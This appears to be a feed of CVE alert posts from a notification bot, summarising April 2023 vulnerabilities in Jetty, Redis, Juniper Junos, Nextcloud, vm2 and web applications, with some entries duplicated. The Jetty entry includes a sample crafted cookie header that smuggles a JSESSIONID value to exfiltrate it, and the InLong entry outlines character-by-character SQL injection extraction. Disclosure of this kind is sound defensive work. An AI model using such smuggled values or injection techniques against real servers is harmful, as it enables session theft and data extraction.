🚨 CVE-2023-26049Jetty is a java based web server and servlet engine. Nonstandard cookie parsing in Jetty may allow an attacker to smuggle cookies within other cookies, or otherwise perform unintended behavior by tampering with the cookie parsing mechanism. If Jetty sees a cookie VALUE that starts with `"` (double quote), it will continue to read the cookie string until it sees a closing quote -- even if a semicolon is encountered. So, a cookie header such as: `DISPLAY_LANGUAGE="b; JSESSIONID=1337; c=d"` will be parsed as one cookie, with the name DISPLAY_LANGUAGE and a value of b; JSESSIONID=1337; c=d instead of 3 separate cookies. This has security implications because if, say, JSESSIONID is an HttpOnly cookie, and the DISPLAY_LANGUAGE cookie value is rendered on the page, an attacker can smuggle the JSESSIONID cookie into the DISPLAY_LANGUAGE cookie and thereby exfiltrate it. This is significant when an intermediary is enacting some policy based on cookies, so a smuggled cookie can bypass that policy yet still be seen by the Jetty server or its logging system. This issue has been addressed in versions 9.4.51, 10.0.14, 11.0.14, and 12.0.0.beta0 and users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-04-18 22:58:22 |
🚨 CVE-2023-26049Jetty is a java based web server and servlet engine. Nonstandard cookie parsing in Jetty may allow an attacker to smuggle cookies within other cookies, or otherwise perform unintended behavior by tampering with the cookie parsing mechanism. If Jetty sees a cookie VALUE that starts with `"` (double quote), it will continue to read the cookie string until it sees a closing quote -- even if a semicolon is encountered. So, a cookie header such as: `DISPLAY_LANGUAGE="b; JSESSIONID=1337; c=d"` will be parsed as one cookie, with the name DISPLAY_LANGUAGE and a value of b; JSESSIONID=1337; c=d instead of 3 separate cookies. This has security implications because if, say, JSESSIONID is an HttpOnly cookie, and the DISPLAY_LANGUAGE cookie value is rendered on the page, an attacker can smuggle the JSESSIONID cookie into the DISPLAY_LANGUAGE cookie and thereby exfiltrate it. This is significant when an intermediary is enacting some policy based on cookies, so a smuggled cookie can bypass that policy yet still be seen by the Jetty server or its logging system. This issue has been addressed in versions 9.4.51, 10.0.14, 11.0.14, and 12.0.0.beta0 and users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-04-18 22:58:21 |
🚨 CVE-2023-28003A CWE-613: Insufficient Session Expiration vulnerability exists that could allow an attacker tomaintain unauthorized access over a hijacked session in PME after the legitimate user hassigned out of their account.🎖@cveNotify |
|
| 2023-04-18 22:58:20 |
🚨 CVE-2023-28839Shoppingfeed PrestaShop is an add-on to the PrestaShop ecommerce platform to synchronize data. The module Shoppingfeed for PrestaShop is vulnerable to SQL injection between version 1.4.0 and 1.8.2 due to a lack of input sanitization. This issue has been addressed in version 1.8.3. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-04-18 22:58:15 |
🚨 CVE-2023-28856Redis is an open source, in-memory database that persists on disk. Authenticated users can use the `HINCRBYFLOAT` command to create an invalid hash field that will crash Redis on access in affected versions. This issue has been addressed in in versions 7.0.11, 6.2.12, and 6.0.19. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-04-18 22:58:14 |
🚨 CVE-2023-29412A CWE-78: Improper Handling of Case Sensitivity vulnerability exists that could cause remotecode execution when manipulating internal methods through Java RMI interface. 🎖@cveNotify |
|
| 2023-04-18 22:58:13 |
🚨 CVE-2023-29413A CWE-306: Missing Authentication for Critical Function vulnerability exists that could causeDenial-of-Service when accessed by an unauthenticated user on the Schneider UPS Monitorservice. 🎖@cveNotify |
|
| 2023-04-18 22:58:12 |
🚨 CVE-2023-0595A CWE-117: Improper Output Neutralization for Logs vulnerability exists that could cause the misinterpretation of log files when malicious packets are sent to the Geo SCADA server's database web port (default 443). Affected products: EcoStruxure Geo SCADA Expert 2019, EcoStruxure Geo SCADA Expert 2020, EcoStruxure Geo SCADA Expert 2021(All Versions prior to October 2022), ClearSCADA (All Versions)🎖@cveNotify |
|
| 2023-04-18 20:58:35 |
🚨 CVE-2023-27520Cross-site request forgery (CSRF) vulnerability in SEIKO EPSON printers/network interface Web Config allows a remote unauthenticated attacker to hijack the authentication and perform unintended operations by having a logged-in user view a malicious page. [Note] Web Config is the software that allows users to check the status and change the settings of SEIKO EPSON printers/network interface via a web browser. According to SEIKO EPSON CORPORATION, it is also called as Remote Manager in some products. Web Config is pre-installed in some printers/network interface provided by SEIKO EPSON CORPORATION. For the details of the affected product names/model numbers, refer to the information provided by the vendor.🎖@cveNotify |
|
| 2023-04-18 20:58:34 |
🚨 CVE-2023-27917OS command injection vulnerability in CONPROSYS IoT Gateway products allows a remote authenticated attacker who can access Network Maintenance page to execute arbitrary OS commands with a root privilege. The affected products and versions are as follows: M2M Gateway with the firmware Ver.3.7.10 and earlier (CPS-MG341-ADSC1-111, CPS-MG341-ADSC1-931, CPS-MG341G-ADSC1-111, CPS-MG341G-ADSC1-930, and CPS-MG341G5-ADSC1-931), M2M Controller Integrated Type with firmware Ver.3.7.6 and earlier versions (CPS-MC341-ADSC1-111, CPS-MC341-ADSC1-931, CPS-MC341-ADSC2-111, CPS-MC341G-ADSC1-110, CPS-MC341Q-ADSC1-111, CPS-MC341-DS1-111, CPS-MC341-DS11-111, CPS-MC341-DS2-911, and CPS-MC341-A1-111), and M2M Controller Configurable Type with firmware Ver.3.8.8 and earlier versions (CPS-MCS341-DS1-111, CPS-MCS341-DS1-131, CPS-MCS341G-DS1-130, CPS-MCS341G5-DS1-130, and CPS-MCS341Q-DS1-131).🎖@cveNotify |
|
| 2023-04-18 20:58:33 |
🚨 CVE-2023-27389Inadequate encryption strength vulnerability in CONPROSYS IoT Gateway products allows a remote authenticated attacker with an administrative privilege to apply a specially crafted Firmware update file, alter the information, cause a denial-of-service (DoS) condition, and/or execute arbitrary code. The affected products and versions are as follows: M2M Gateway with the firmware Ver.3.7.10 and earlier (CPS-MG341-ADSC1-111, CPS-MG341-ADSC1-931, CPS-MG341G-ADSC1-111, CPS-MG341G-ADSC1-930, and CPS-MG341G5-ADSC1-931), M2M Controller Integrated Type with firmware Ver.3.7.6 and earlier versions (CPS-MC341-ADSC1-111, CPS-MC341-ADSC1-931, CPS-MC341-ADSC2-111, CPS-MC341G-ADSC1-110, CPS-MC341Q-ADSC1-111, CPS-MC341-DS1-111, CPS-MC341-DS11-111, CPS-MC341-DS2-911, and CPS-MC341-A1-111), and M2M Controller Configurable Type with firmware Ver.3.8.8 and earlier versions (CPS-MCS341-DS1-111, CPS-MCS341-DS1-131, CPS-MCS341G-DS1-130, CPS-MCS341G5-DS1-130, and CPS-MCS341Q-DS1-131).🎖@cveNotify |
|
| 2023-04-18 20:58:32 |
🚨 CVE-2023-23575Improper access control vulnerability in CONPROSYS IoT Gateway products allows a remote authenticated attacker to bypass access restriction and access Network Maintenance page, which may result in obtaining the network information of the product. The affected products and versions are as follows: M2M Gateway with the firmware Ver.3.7.10 and earlier (CPS-MG341-ADSC1-111, CPS-MG341-ADSC1-931, CPS-MG341G-ADSC1-111, CPS-MG341G-ADSC1-930, and CPS-MG341G5-ADSC1-931), M2M Controller Integrated Type with firmware Ver.3.7.6 and earlier versions (CPS-MC341-ADSC1-111, CPS-MC341-ADSC1-931, CPS-MC341-ADSC2-111, CPS-MC341G-ADSC1-110, CPS-MC341Q-ADSC1-111, CPS-MC341-DS1-111, CPS-MC341-DS11-111, CPS-MC341-DS2-911, and CPS-MC341-A1-111), and M2M Controller Configurable Type with firmware Ver.3.8.8 and earlier versions (CPS-MCS341-DS1-111, CPS-MCS341-DS1-131, CPS-MCS341G-DS1-130, CPS-MCS341G5-DS1-130, and CPS-MCS341Q-DS1-131).🎖@cveNotify |
|
| 2023-04-18 20:58:28 |
🚨 CVE-2023-24544Improper access control vulnerability in Buffalo network devices allows a network-adjacent attacker to obtain specific files of the product. As a result, the product settings may be altered. The affected products and versions are as follows: BS-GSL2024 firmware Ver. 1.10-0.03 and earlier, BS-GSL2016P firmware Ver. 1.10-0.03 and earlier, BS-GSL2016 firmware Ver. 1.10-0.03 and earlier, BS-GS2008 firmware Ver. 1.0.10.01 and earlier, BS-GS2016 firmware Ver. 1.0.10.01 and earlier, BS-GS2024 firmware Ver. 1.0.10.01 and earlier, BS-GS2048 firmware Ver. 1.0.10.01 and earlier, BS-GS2008P firmware Ver. 1.0.10.01 and earlier, BS-GS2016P firmware Ver. 1.0.10.01 and earlier, and BS-GS2024P firmware Ver. 1.0.10.01 and earlier🎖@cveNotify |
|
| 2023-04-18 20:58:27 |
🚨 CVE-2023-28368TP-Link L2 switch T2600G-28SQ firmware versions prior to 'T2600G-28SQ(UN)_V1_1.0.6 Build 20230227' uses vulnerable SSH host keys. A fake device may be prepared to spoof the affected device with the vulnerable host key.If the administrator may be tricked to login to the fake device, the credential information for the affected device may be obtained.🎖@cveNotify |
|
| 2023-04-18 20:58:26 |
🚨 CVE-2023-30465Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.5.0. By manipulating the "orderType" parameter and the ordering of the returned content using an SQL injection attack, an attacker can extract the username of the user with ID 1 from the "user" table, one character at a time. Users are advised to upgrade to Apache InLong's 1.6.0 or cherry-pick [1] to solve it. https://programmer.help/blogs/jdbc-deserialization-vulnerability-learning.html [1] https://github.com/apache/inlong/issues/7529 https://github.com/apache/inlong/issues/7529 🎖@cveNotify |
|
| 2023-04-18 20:58:25 |
🚨 CVE-2022-43951An exposure of sensitive information to an unauthorized actor vulnerability [CWE-200] in FortiNAC 9.4.1 and below, 9.2.6 and below, 9.1.8 and below, 8.8.11 and below, 8.7.6 and below may allow an unauthenticated attacker to access sensitive information via crafted HTTP requests.🎖@cveNotify |
|
| 2023-04-18 20:58:21 |
🚨 CVE-2023-1983A vulnerability was found in SourceCodester Sales Tracker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/products/manage_product.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-225530 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-18 20:58:20 |
🚨 CVE-2023-26122All versions of the package safe-eval are vulnerable to Sandbox Bypass due to improper input sanitization. The vulnerability is derived from prototype pollution exploitation.Exploiting this vulnerability might result in remote code execution ("RCE").**Vulnerable functions:**__defineGetter__, stack(), toLocaleString(), propertyIsEnumerable.call(), valueOf().🎖@cveNotify |
|
| 2023-04-18 20:58:19 |
🚨 CVE-2022-43948A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiWeb version 7.0.0 through 7.0.3, FortiADC version 7.1.0 through 7.1.1, FortiADC version 7.0.0 through 7.0.3, FortiADC 6.2 all versions, FortiADC 6.1 all versions, FortiADC 6.0 all versions, FortiADC 5.4 all versions, FortiADC 5.3 all versions, FortiADC 5.2 all versions, FortiADC 5.1 all versions allows attacker to execute unauthorized code or commands via specifically crafted arguments to existing commands.🎖@cveNotify |
|
| 2023-04-18 20:58:18 |
🚨 CVE-2013-4517Apache Santuario XML Security for Java before 1.5.6, when applying Transforms, allows remote attackers to cause a denial of service (memory consumption) via crafted Document Type Definitions (DTDs), related to signatures.🎖@cveNotify |
|
| 2023-04-18 20:58:14 |
🚨 CVE-2022-43952An improper neutralization of input during web page generation ('Cross-site Scripting') vulnerability [CWE-79] in FortiADC version 7.1.1 and below, version 7.0.3 and below, version 6.2.5 and below may allow an authenticated attacker to perform a cross-site scripting attack via crafted HTTP requests.🎖@cveNotify |
|
| 2023-04-18 20:58:13 |
🚨 CVE-2023-27645An issue found in POWERAMP audioplayer build 925 bundle play and build 954 allows a remote attacker to gain privileges via the reverb and EQ preset parameters.🎖@cveNotify |
|
| 2023-04-18 20:58:12 |
🚨 CVE-2022-43955An improper neutralization of input during web page generation [CWE-79] in the FortiWeb web interface 7.0.0 through 7.0.3, 6.3.0 through 6.3.21, 6.4 all versions, 6.2 all versions, 6.1 all versions and 6.0 all versions may allow an unauthenticated and remote attacker to perform a reflected cross site scripting attack (XSS) via injecting malicious payload in log entries used to build report.🎖@cveNotify |
|
| 2023-04-18 16:58:13 |
🚨 CVE-2023-2152A vulnerability has been found in SourceCodester Student Study Center Desk Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file index.php. The manipulation of the argument page leads to file inclusion. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-226273 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-18 16:58:12 |
🚨 CVE-2023-22282WAB-MAT Ver.5.0.0.8 and earlier starts another program with an unquoted file path. Since a registered Windows service path contains spaces and are unquoted, if a malicious executable is placed on a certain path, the executable may be executed with the privilege of the Windows service.🎖@cveNotify |
|
| 2023-04-18 14:58:26 |
🚨 CVE-2023-2146A vulnerability was found in Campcodes Online Thesis Archiving System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file classes/Master.php. The manipulation of the argument name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-226267.🎖@cveNotify |
|
| 2023-04-18 14:58:25 |
🚨 CVE-2023-2147A vulnerability was found in Campcodes Online Thesis Archiving System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/students/view_details.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-226268.🎖@cveNotify |
|
| 2023-04-18 12:58:14 |
🚨 CVE-2023-2145A vulnerability was found in Campcodes Online Thesis Archiving System 1.0. It has been classified as critical. Affected is an unknown function of the file projects_per_curriculum.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226266 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-18 12:58:13 |
🚨 CVE-2023-2043A vulnerability, which was classified as problematic, was found in Control iD RHiD 23.3.19.0. This affects an unknown part of the file /v2/customerdb/operator.svc/a of the component Edit Handler. The manipulation of the argument email leads to sql injection. It is possible to initiate the attack remotely. The identifier VDB-225921 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-04-18 10:58:18 |
🚨 CVE-2023-22620An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.🎖@cveNotify |
|
| 2023-04-18 10:58:14 |
🚨 CVE-2022-1941A parsing vulnerability for the MessageSet type in the ProtocolBuffers versions prior to and including 3.16.1, 3.17.3, 3.18.2, 3.19.4, 3.20.1 and 3.21.5 for protobuf-cpp, and versions prior to and including 3.16.1, 3.17.3, 3.18.2, 3.19.4, 3.20.1 and 4.21.5 for protobuf-python can lead to out of memory failures. A specially crafted message with multiple key-value per elements creates parsing issues, and can lead to a Denial of Service against services receiving unsanitized input. We recommend upgrading to versions 3.18.3, 3.19.5, 3.20.2, 3.21.6 for protobuf-cpp and 3.18.3, 3.19.5, 3.20.2, 4.21.6 for protobuf-python. Versions for 3.16 and 3.17 are no longer updated.🎖@cveNotify |
|
| 2023-04-18 10:58:13 |
🚨 CVE-2023-2090A vulnerability classified as critical has been found in SourceCodester Employee and Visitor Gate Pass Logging System 1.0. Affected is an unknown function of the file /admin/maintenance/view_designation.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226098 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-18 05:58:13 |
🚨 CVE-2022-40267Predictable Seed in Pseudo-Random Number Generator (PRNG) vulnerability in Mitsubishi Electric Corporation MELSEC iQ-F Series FX5U-xMy/z (x=32,64,80, y=T,R, z=ES,DS,ESS,DSS) with serial number 17X**** or later, and versions 1.280 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5U-xMy/z (x=32,64,80, y=T,R, z=ES,DS,ESS,DSS) with serial number 179**** and prior, and versions 1.074 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UC-xMy/z (x=32,64,96, y=T, z=D,DSS)) with serial number 17X**** or later, and versions 1.280 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UC-xMy/z (x=32,64,96, y=T, z=D,DSS)) with serial number 179**** and prior, and versions 1.074 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UC-32MT/DS-TS versions 1.280 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UC-32MT/DSS-TS versions 1.280 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UJ-xMy/z (x=24,40,60, y=T,R, z=ES,ESS) versions 1.042 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UJ-xMy/ES-A (x=24,40,60, y=T,R) versions 1.043 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5S-xMy/z (x=30,40,60,80, y=T,R, z=ES,ESS) versions 1.003 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UC-32MR/DS-TS versions 1.280 and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R00/01/02CPU versions 33 and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R04/08/16/32/120(EN)CPU versions 66 and prior allows a remote unauthenticated attacker to access the Web server function by guessing the random numbers used for authentication from several used random numbers.🎖@cveNotify |
|
| 2023-04-18 05:58:12 |
🚨 CVE-2023-2120The Thumbnail carousel slider plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the search_term parameter in versions up to, and including, 1.1.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-04-18 00:58:36 |
🚨 CVE-2023-28979An Improper Check for Unusual or Exceptional Conditions vulnerability in the kernel of Juniper Networks Junos OS allows an adjacent unauthenticated attacker to bypass an integrity check. In a 6PE scenario and if an additional integrity check is configured, it will fail to drop specific malformed IPv6 packets, and then these packets will be forwarded to other connected networks. This issue affects Juniper Networks Junos OS: All versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R3-S9; 20.2 versions prior to 20.2R3-S7; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S3; 21.2 versions prior to 21.2R3-S2; 21.3 versions prior to 21.3R3-S1; 21.4 versions prior to 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R2; 22.2 versions prior to 22.2R2.🎖@cveNotify |
|
| 2023-04-18 00:58:35 |
🚨 CVE-2023-28976An Improper Check for Unusual or Exceptional Conditions vulnerability in the packet forwarding engine (pfe) of Juniper Networks Junos OS on MX Series allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). If specific traffic is received on MX Series and its rate exceeds the respective DDoS protection limit the ingress PFE will crash and restart. Continued receipt of this traffic will create a sustained DoS condition. This issue affects Juniper Networks Junos OS on MX Series: All versions prior to 19.1R3-S10; 19.2 versions prior to 19.2R3-S7; 19.3 versions prior to 19.3R3-S8; 19.4 versions prior to 19.4R3-S11; 20.2 versions prior to 20.2R3-S5; 20.4 versions prior to 20.4R3-S6; 21.1 versions prior to 21.1R3-S5; 21.2 versions prior to 21.2R3-S4; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R3; 22.1 versions prior to 22.1R2.🎖@cveNotify |
|
| 2023-04-18 00:58:34 |
🚨 CVE-2023-28981An Improper Input Validation vulnerability in the kernel of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, adjacent attacker to cause a Denial of Service (DoS). If the receipt of router advertisements is enabled on an interface and a specifically malformed RA packet is received, memory corruption will happen which leads to an rpd crash. This issue affects: Juniper Networks Junos OS 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S3; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2. Juniper Networks Junos OS Evolved 20.3-EVO version 20.3R1-EVO and later versions; 20.4-EVO versions prior to 20.4R3-S6-EVO; 21.3-EVO versions prior to 21.3R3-EVO; 21.4-EVO versions prior to 21.4R2-EVO; 22.1-EVO versions prior to 22.1R2-EVO.🎖@cveNotify |
|
| 2023-04-18 00:58:33 |
🚨 CVE-2023-28981An Improper Input Validation vulnerability in the kernel of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, adjacent attacker to cause a Denial of Service (DoS). If the receipt of router advertisements is enabled on an interface and a specifically malformed RA packet is received, memory corruption will happen which leads to an rpd crash. This issue affects: Juniper Networks Junos OS 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S3; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2. Juniper Networks Junos OS Evolved 20.3-EVO version 20.3R1-EVO and later versions; 20.4-EVO versions prior to 20.4R3-S6-EVO; 21.3-EVO versions prior to 21.3R3-EVO; 21.4-EVO versions prior to 21.4R2-EVO; 22.1-EVO versions prior to 22.1R2-EVO.🎖@cveNotify |
|
| 2023-04-18 00:58:32 |
🚨 CVE-2023-28982A Missing Release of Memory after Effective Lifetime vulnerability in the routing protocol daemon of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network based attacker to cause a Denial of Service (DoS). In a BGP rib sharding scenario, when an attribute of an active BGP route is updated memory will leak. As rpd memory usage increases over time the rpd process will eventually run out of memory, crash, and restart. The memory utilization can be monitored with the following CLI commands: show task memory show system processes extensive | match rpd This issue affects: Juniper Networks Junos OS 20.3 versions prior to 20.3R3-S2; 20.4 versions prior to 20.4R3-S6; 21.1 versions prior to 21.1R3; 21.2 versions prior to 21.2R3; 21.3 versions prior to 21.3R2. Juniper Networks Junos OS Evolved 20.3-EVO version 20.3R1-EVO and later versions; 20.4-EVO versions prior to 20.4R3-S6-EVO; 21.2-EVO versions prior to 21.2R3-EVO; 21.3-EVO versions prior to 21.3R2-EVO.🎖@cveNotify |
|
| 2023-04-18 00:58:30 |
🚨 CVE-2023-29197guzzlehttp/psr7 is a PSR-7 HTTP message library implementation in PHP. Affected versions are subject to improper header parsing. An attacker could sneak in a newline (\n) into both the header names and values. While the specification states that \r\n\r\n is used to terminate the header list, many servers in the wild will also accept \n\n. This is a follow-up to CVE-2022-24775 where the fix was incomplete. The issue has been patched in versions 1.9.1 and 2.4.5. There are no known workarounds for this vulnerability. Users are advised to upgrade.🎖@cveNotify |
|
| 2023-04-18 00:58:29 |
🚨 CVE-2023-30536slim/psr7 is a PSR-7 implementation for use with Slim 4. In versions prior to 1.6.1 an attacker could sneak in a newline (\n) into both the header names and values. While the specification states that \r\n\r\n is used to terminate the header list, many servers in the wild will also accept \n\n. An attacker that is able to control the header names that are passed to Slilm-Psr7 would be able to intentionally craft invalid messages, possibly causing application errors or invalid HTTP requests being sent out with an PSR-18 HTTP client. The latter might present a denial of service vector if a remote service’s web application firewall bans the application due to the receipt of malformed requests. The issue has been patched in version 1.6.1. There are no known workarounds to this issue. Users are advised to upgrade.🎖@cveNotify |
|
| 2023-04-18 00:58:28 |
🚨 CVE-2023-29213XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions of `org.xwiki.platform:xwiki-platform-logging-ui` it is possible to trick a user with programming rights into visiting a constructed url where e.g., by embedding an image with this URL in a document that is viewed by a user with programming rights which will evaluate an expression in the constructed url and execute it. This issue has been addressed in versions 13.10.11, 14.4.7, and 14.10. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-04-18 00:58:27 |
🚨 CVE-2023-30539Nextcloud is a personal home server system. Depending on the set up tags and other workflows this issue can be used to limit access of others or being able to grant them access when there are system tag based files access control or files retention rules. It is recommended that the Nextcloud Server is upgraded to 24.0.11 or 25.0.5, the Nextcloud Enterprise Server to 21.0.9.11, 22.2.10.11, 23.0.12.6, 24.0.11 or 25.0.5, and the Nextcloud Files automated tagging app to 1.11.1, 1.12.1, 1.13.1, 1.14.2, 1.15.3 or 1.16.1. Users unable to upgrade should disable all workflow related apps. Users are advised to upgrade.🎖@cveNotify |
|
| 2023-04-18 00:58:26 |
🚨 CVE-2023-30539Nextcloud is a personal home server system. Depending on the set up tags and other workflows this issue can be used to limit access of others or being able to grant them access when there are system tag based files access control or files retention rules. It is recommended that the Nextcloud Server is upgraded to 24.0.11 or 25.0.5, the Nextcloud Enterprise Server to 21.0.9.11, 22.2.10.11, 23.0.12.6, 24.0.11 or 25.0.5, and the Nextcloud Files automated tagging app to 1.11.1, 1.12.1, 1.13.1, 1.14.2, 1.15.3 or 1.16.1. Users unable to upgrade should disable all workflow related apps. Users are advised to upgrade.🎖@cveNotify |
|
| 2023-04-18 00:58:25 |
🚨 CVE-2023-30540Nextcloud Talk is a chat, video & audio call extension for Nextcloud. In affected versions a user that was added later to a conversation can use this information to get access to data that was deleted before they were added to the conversation. This issue has been patched in version 15.0.5 and it is recommended that users upgrad to 15.0.5. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-04-18 00:58:24 |
🚨 CVE-2023-30540Nextcloud Talk is a chat, video & audio call extension for Nextcloud. In affected versions a user that was added later to a conversation can use this information to get access to data that was deleted before they were added to the conversation. This issue has been patched in version 15.0.5 and it is recommended that users upgrad to 15.0.5. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-04-18 00:58:23 |
🚨 CVE-2023-30541OpenZeppelin Contracts is a library for secure smart contract development. A function in the implementation contract may be inaccessible if its selector clashes with one of the proxy's own selectors. Specifically, if the clashing function has a different signature with incompatible ABI encoding, the proxy could revert while attempting to decode the arguments from calldata. The probability of an accidental clash is negligible, but one could be caused deliberately and could cause a reduction in availability. The issue has been fixed in version 4.8.3. As a workaround if a function appears to be inaccessible for this reason, it may be possible to craft the calldata such that ABI decoding does not fail at the proxy and the function is properly proxied through.🎖@cveNotify |
|
| 2023-04-18 00:58:22 |
🚨 CVE-2023-30541OpenZeppelin Contracts is a library for secure smart contract development. A function in the implementation contract may be inaccessible if its selector clashes with one of the proxy's own selectors. Specifically, if the clashing function has a different signature with incompatible ABI encoding, the proxy could revert while attempting to decode the arguments from calldata. The probability of an accidental clash is negligible, but one could be caused deliberately and could cause a reduction in availability. The issue has been fixed in version 4.8.3. As a workaround if a function appears to be inaccessible for this reason, it may be possible to craft the calldata such that ABI decoding does not fail at the proxy and the function is properly proxied through.🎖@cveNotify |
|
| 2023-04-18 00:58:21 |
🚨 CVE-2023-30543@web3-react is a framework for building Ethereum Apps . In affected versions the `chainId` may be outdated if the user changes chains as part of the connection flow. This means that the value of `chainId` returned by `useWeb3React()` may be incorrect. In an application, this means that any data derived from `chainId` could be incorrect. For example, if a swapping application derives a wrapped token contract address from the `chainId` *and* a user has changed chains as part of their connection flow the application could cause the user to send funds to the incorrect address when wrapping. This issue has been addressed in PR #749 and is available in updated npm artifacts. There are no known workarounds for this issue. Users are advised to upgrade.🎖@cveNotify |
|
| 2023-04-18 00:58:16 |
🚨 CVE-2023-30547vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules. There exists a vulnerability in exception sanitization of vm2 for versions up to 3.9.16, allowing attackers to raise an unsanitized host exception inside `handleException()` which can be used to escape the sandbox and run arbitrary code in host context. This vulnerability was patched in the release of version `3.9.17` of `vm2`. There are no known workarounds for this vulnerability. Users are advised to upgrade.🎖@cveNotify |
|
| 2023-04-18 00:58:15 |
🚨 CVE-2023-1697An Improper Handling of Missing Values vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS allows an adjacent, unauthenticated attacker to cause a dcpfe process core and thereby a Denial of Service (DoS). Continued receipt of these specific frames will cause a sustained Denial of Service condition. This issue occurs when a specific malformed ethernet frame is received. This issue affects Juniper Networks Junos OS on QFX10000 Series, PTX1000 Series Series: All versions prior to 19.4R3-S10; 20.1 version 20.1R1 and later versions; 20.2 versions prior to 20.2R3-S6; 20.3 versions prior to 20.3R3-S6; 20.4 versions prior to 20.4R3-S5; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S3; 21.3 versions prior to 21.3R3-S3; 21.4 versions prior to 21.4R3-S1; 22.1 versions prior to 22.1R2-S1, 22.1R3; 22.2 versions prior to 22.2R1-S2, 22.2R2.🎖@cveNotify |
|
| 2023-04-18 00:58:14 |
🚨 CVE-2023-24502Electra Central AC unit – The unit opens an AP with an easily calculated password.🎖@cveNotify |
|
| 2023-04-18 00:58:13 |
🚨 CVE-2023-28967A Use of Uninitialized Resource vulnerability in the Border Gateway Protocol (BGP) software of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated network-based attacker to send specific genuine BGP packets to a device configured with BGP to cause a Denial of Service (DoS) by crashing the Routing Protocol Daemon (rpd). This issue is triggered when the packets attempt to initiate a BGP connection before a BGP session is successfully established. Continued receipt of these specific BGP packets will cause a sustained Denial of Service condition. This issue is triggerable in both iBGP and eBGP deployments. This issue affects: Juniper Networks Junos OS 21.1 version 21.1R1 and later versions prior to 21.1R3-S5; 21.2 version 21.2R1 and later versions prior to 21.2R3-S2; 21.3 version 21.3R1 and later versions prior to 21.3R3-S2; 21.4 versions prior to 21.4R3; 22.1 versions prior to 22.1R3; 22.2 versions prior to 22.2R2. This issue does not affect Juniper Networks Junos OS versions prior to 21.1R1. This issue affects: Juniper Networks Junos OS Evolved 21.1-EVO version 21.1R1-EVO and later versions prior to 21.4R3-EVO; 22.1-EVO versions prior to 22.1R3-EVO; 22.2-EVO versions prior to 22.2R2-EVO. This issue does not affect Juniper Networks Junos OS Evolved versions prior to 21.1R1-EVO.🎖@cveNotify |
|
| 2023-04-17 23:58:24 |
